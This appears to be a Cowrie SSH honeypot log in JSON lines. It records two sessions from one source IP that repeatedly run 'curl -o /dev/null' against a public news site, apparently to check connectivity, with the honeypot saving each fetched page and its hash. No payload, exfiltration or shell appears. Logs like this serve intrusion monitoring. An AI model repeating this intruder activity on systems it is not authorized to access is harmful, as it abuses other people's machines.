{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.961364Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.962266Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.969781Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.977763Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.980090Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.991348Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.992367Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.006724Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.007711Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.013173Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.016015Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.018130Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.019847Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.034167Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.035288Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.044149Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.045035Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.060540Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.072628Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.073860Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.081390Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.082319Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.084121Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.112864Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.114370Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.120725Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.121685Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.137336Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.146601Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.153689Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.154720Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.157216Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.158835Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.193778Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.194897Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.197268Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.198342Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.201935Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.219469Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.232126Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.233151Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.234462Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.238684Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.239552Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.261936Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.270613Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.273296Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.274318Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.277840Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.279074Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.282730Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.286325Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.300737Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.313465Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.314497Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.317892Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.318796Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.350388Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.351433Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.363931Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.364806Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.380595Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.386344Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.387225Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.391084Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.403582Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.404600Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.414927Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.423084Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.423999Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.442786Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.443966Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.444971Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.458107Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.462814Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.463991Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.470034Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.484809Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.485807Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.501862Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.502928Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.525197Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.527163Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.527945Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.534262Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.539121Z","src_ip":"212.227.125.160","session":"7541ed730449"}
